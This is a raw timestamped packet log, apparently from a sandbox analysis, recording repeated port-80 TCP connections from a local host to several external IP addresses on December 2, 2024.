                                                                                                                  Dec 2, 2024 15:24:31.495521069 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:31.615529060 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:31.618583918 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:31.683051109 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:31.803031921 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:31.803066015 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:32.998274088 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:33.049845934 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:33.190577030 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:33.201117039 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:33.202544928 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.355878115 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.476008892 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:34.476103067 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.699871063 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.820947886 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:35.873297930 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:35.928548098 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:36.075382948 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:36.075552940 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:36.076663017 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:36.196527004 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:41.545818090 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:41.665972948 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:41.666600943 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:41.681350946 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:41.801244974 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:42.989131927 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:42.989264011 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:42.989310980 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:43.190720081 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.212541103 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.332618952 CET804990546.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:44.332699060 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.352227926 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.472161055 CET804990546.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:45.641560078 CET804990546.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:45.641690016 CET804990546.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:45.641832113 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:45.862433910 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:46.883783102 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:47.003846884 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:47.003933907 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:47.027004004 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:47.147291899 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:47.147309065 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:48.311336040 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:48.362325907 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:48.405545950 CET804991446.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:48.405608892 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:48.535212994 CET4991480192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.553100109 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.673330069 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:49.673430920 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.683216095 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:49.803558111 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:50.989335060 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:50.989502907 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:50.989605904 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:50.992428064 CET4992080192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:51.112463951 CET804992046.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:56.785228968 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:56.905250072 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:56.905451059 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:56.919828892 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:57.039839983 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.149471045 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.149585962 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.149770021 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:58.424916029 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:58.746386051 CET8049936103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:58.746438980 CET4993680192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.444574118 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.565140009 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:59.569209099 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.584525108 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:24:59.704572916 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:00.822520971 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:00.822663069 CET8049942103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:00.822710037 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:01.096812963 CET4994280192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.116997004 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.236907959 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:02.237035990 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.252502918 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:02.372637033 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:02.372653008 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:03.546399117 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:03.546411991 CET8049948103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:03.552587986 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:03.768866062 CET4994880192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:04.789002895 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:04.909284115 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:04.909390926 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:04.921197891 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:05.041140079 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141623974 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141657114 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141670942 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:06.141855955 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:06.141855955 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:06.146522045 CET4995580192.168.2.5103.224.182.242
                                                                                                                  Dec 2, 2024 15:25:06.266530037 CET8049955103.224.182.242192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:12.352336884 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:12.472331047 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:12.472418070 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:12.496956110 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:12.616931915 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.002988100 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:14.074155092 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.074286938 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:14.074922085 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.075109005 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:14.123193026 CET8049972149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:14.123594046 CET4997280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.022811890 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.142858982 CET8049981149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:15.142956018 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.165941954 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:15.286156893 CET8049981149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:16.675008059 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:16.795341969 CET8049981149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:16.795419931 CET4998180192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.694153070 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.814203978 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:17.814351082 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.830518007 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:17.950525999 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:17.950577021 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:19.331147909 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:19.424402952 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:19.424649000 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:19.451792955 CET8049987149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:19.452011108 CET4998780192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.350693941 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.471584082 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:20.471695900 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.484267950 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:20.604758978 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:22.080389977 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:22.080404997 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:22.080569029 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:22.083523989 CET4999280192.168.2.5149.88.81.190
                                                                                                                  Dec 2, 2024 15:25:22.203490973 CET8049992149.88.81.190192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:27.967376947 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:28.087382078 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:28.087656975 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:28.108784914 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:28.228960991 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:29.612576008 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:29.637854099 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:29.638012886 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:29.638111115 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:29.638112068 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:29.732533932 CET8050001101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:29.732800961 CET5000180192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:30.632798910 CET5000280192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:30.753063917 CET8050002101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:30.753155947 CET5000280192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:30.773058891 CET5000280192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:30.893255949 CET8050002101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:32.284328938 CET5000280192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:32.335412979 CET8050002101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:32.335488081 CET8050002101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:32.338557959 CET5000280192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:32.338557959 CET5000280192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:32.404660940 CET8050002101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:32.404717922 CET5000280192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:33.304081917 CET5000380192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:33.424055099 CET8050003101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:33.426695108 CET5000380192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:33.440824032 CET5000380192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:33.561191082 CET8050003101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:33.561204910 CET8050003101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:34.956722975 CET5000380192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:35.077104092 CET8050003101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:35.077178955 CET5000380192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:35.976861000 CET5000480192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:36.097318888 CET8050004101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:36.100763083 CET5000480192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:36.112504959 CET5000480192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:36.233313084 CET8050004101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:37.654850960 CET8050004101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:37.654987097 CET8050004101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:37.661755085 CET5000480192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:37.661755085 CET5000480192.168.2.5101.35.209.183
                                                                                                                  Dec 2, 2024 15:25:37.781814098 CET8050004101.35.209.183192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:43.218935013 CET5000580192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:43.339020014 CET805000538.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:43.339337111 CET5000580192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:43.352871895 CET5000580192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:43.473198891 CET805000538.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:44.862317085 CET5000580192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:44.873356104 CET805000538.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:44.873420954 CET5000580192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:44.873460054 CET805000538.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:44.873507977 CET5000580192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:44.982270956 CET805000538.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:44.982319117 CET5000580192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:45.881392956 CET5000680192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:46.001254082 CET805000638.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:46.006632090 CET5000680192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:46.024542093 CET5000680192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:46.144603014 CET805000638.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:47.536739111 CET5000680192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:47.656086922 CET805000638.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:47.656383991 CET805000638.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:47.656485081 CET5000680192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:47.656485081 CET5000680192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:47.656702995 CET805000638.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:47.656766891 CET5000680192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:48.554219007 CET5000780192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:48.674349070 CET805000738.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:48.674455881 CET5000780192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:48.694571018 CET5000780192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:48.814594030 CET805000738.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:48.814668894 CET805000738.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:50.206089020 CET5000780192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:50.327146053 CET805000738.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:50.328795910 CET5000780192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:51.225522041 CET5000880192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:51.345438004 CET805000838.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:51.345578909 CET5000880192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:51.355058908 CET5000880192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:51.474992037 CET805000838.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:53.002049923 CET805000838.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:53.002140999 CET805000838.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:53.002213001 CET5000880192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:53.057360888 CET5000880192.168.2.538.47.232.202
                                                                                                                  Dec 2, 2024 15:25:53.177282095 CET805000838.47.232.202192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:58.795384884 CET5000980192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:25:58.915621996 CET8050009208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:25:58.915704012 CET5000980192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:25:59.039925098 CET5000980192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:25:59.159981966 CET8050009208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:00.206399918 CET8050009208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:00.206506968 CET5000980192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:00.565602064 CET5000980192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:00.685895920 CET8050009208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:01.584755898 CET5001080192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:01.704911947 CET8050010208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:01.706604958 CET5001080192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:01.720887899 CET5001080192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:01.841128111 CET8050010208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:03.231137991 CET8050010208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:03.231206894 CET5001080192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:03.237386942 CET5001080192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:03.346268892 CET8050010208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:03.346330881 CET5001080192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:03.357419014 CET8050010208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:04.258168936 CET5001180192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:04.378601074 CET8050011208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:04.386518955 CET5001180192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:04.398523092 CET5001180192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:04.518821001 CET8050011208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:04.519013882 CET8050011208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:05.592056036 CET8050011208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:05.592144966 CET5001180192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:05.909167051 CET5001180192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:06.029155970 CET8050011208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:06.928845882 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:07.048986912 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:07.049091101 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:07.059227943 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:07.180543900 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.807476997 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.807610035 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.807723045 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:08.807725906 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.807742119 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.807779074 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:08.807931900 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.807945967 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.807984114 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:08.852533102 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.852550030 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.852565050 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.852581024 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.852704048 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:08.927750111 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.927772999 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:08.927943945 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.009002924 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.009043932 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.009226084 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.013488054 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.013530016 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.013616085 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.021655083 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.021747112 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.021857977 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.030150890 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.030301094 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.030390024 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.038717985 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.038733006 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.038835049 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.047002077 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.053891897 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.053958893 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.054287910 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.058190107 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.058247089 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.058305025 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.066577911 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.066623926 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.066684008 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.075151920 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.075166941 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.075303078 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.083492994 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.083559990 CET5001280192.168.2.5208.91.197.39
                                                                                                                  Dec 2, 2024 15:26:09.083605051 CET8050012208.91.197.39192.168.2.5
                                                                                                                  Dec 2, 2024 15:26:09.150612116 CET8050012208.91.197.39192.168.2.5
